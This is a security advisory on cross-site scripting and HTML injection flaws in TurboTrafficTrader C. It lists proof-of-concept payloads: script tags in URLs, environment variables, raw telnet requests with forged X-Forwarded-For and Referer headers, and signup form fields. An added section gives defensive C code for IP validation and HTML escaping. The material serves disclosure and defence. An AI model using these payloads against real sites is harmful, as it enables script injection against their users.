TurboTrafficTrader C Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
No exploit is required, but Kaloyan Olegov Georgiev has supplied the following proof of concept code and examples:

    http://www.example.com/cgi-bin/ttt-out?link=testing%20%3Cscript%3Ealert('from_browser_insert');%3C/script%3E
    http://www.example.com/cgi-bin/ttt-out?link=testing%20<script>alert('from_browser_insert');</script>

    export REMOTE_ADDR="127.0.0.1<script>alert('ip_inject');</script>"
    ./ttt-in

will load one bad record for IP

    export HTTP_X_FORWARDED_FOR="10.0.0.1<script>alert('proxy insertion');</script>"
    ./ttt-in

will load an XSSed proxy record

Raw connection example:

    telnet www.example.com 80
    Trying www.example.com...
    Connected to www.example.com.
    Escape character is '^]'.
    GET /cgi-bin/ttt-in HTTP/1.1
    X-Forwarded-For: 192.168.0.1<script>alert('proxy_insert');</script>
    Host: www.example.com

    telnet www.example.com 80
    Trying www.example.com...
    Connected to www.example.com.
    Escape character is '^]'.
    GET /cgi-bin/ttt-in HTTP/1.1
    X-Forwarded-For: 192.168.0.6<script>alert('proxy_insert');</script>
    Referer: http://www.referrer.com"<script>alert('referrer_inject');</script>"
    Host: www.example.com

When signing up for a new account:

    Site name = Name"<script>window.open('http://www.example.com');</script>
    Site URL = http://www.example.com"<script>alert('name_inject');</script>
    Webmaster e-mail = email@example.com"<script>alert('email_inject');</script>
    Webmaster ICQ = 123456"<script>alert('ICQ_inject');</script>
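A defensive counterpart to the inputs listed above, as an added example that is not part of the original advisory and is not TurboTrafficTrader's own code: address-like values (REMOTE_ADDR, X-Forwarded-For) are checked against a strict IP grammar before storage, and free-text values (link, Referer, signup fields) are HTML-escaped on output. The helper names `is_valid_ip` and `html_escape` are hypothetical, and the header is assumed to carry a single address rather than a comma-separated list.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: accept only a single IPv4/IPv6 literal, so a value
 * such as 127.0.0.1<script>... is rejected before it is stored. */
int is_valid_ip(const char *s) {
    unsigned char buf[sizeof(struct in6_addr)];
    if (s == NULL) return 0;
    return inet_pton(AF_INET, s, buf) == 1 || inet_pton(AF_INET6, s, buf) == 1;
}

/* Hypothetical helper: HTML-escape src into dst (dstlen bytes) for output in
 * element or quoted-attribute context. Returns 0, or -1 if dst is too small
 * (dst is then left as a valid, truncated string). */
int html_escape(const char *src, char *dst, size_t dstlen) {
    size_t o = 0;
    if (dstlen == 0) return -1;
    for (; *src; src++) {
        const char *rep = NULL;
        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t n = rep ? strlen(rep) : 1;
        if (o + n >= dstlen) { dst[o] = '\0'; return -1; }
        if (rep) memcpy(dst + o, rep, n); else dst[o] = *src;
        o += n;
    }
    dst[o] = '\0';
    return 0;
}

int main(void) {
    /* Constructed samples modelled on the advisory's inputs. */
    const char *xff = "192.168.0.1<script>alert('proxy_insert');</script>";
    const char *site = "Name\"<script>window.open('http://www.example.com');</script>";
    char out[256];
    printf("X-Forwarded-For accepted: %d\n", is_valid_ip(xff));
    if (html_escape(site, out, sizeof out) == 0)
        printf("Site name rendered as: %s\n", out);
    return 0;
}
```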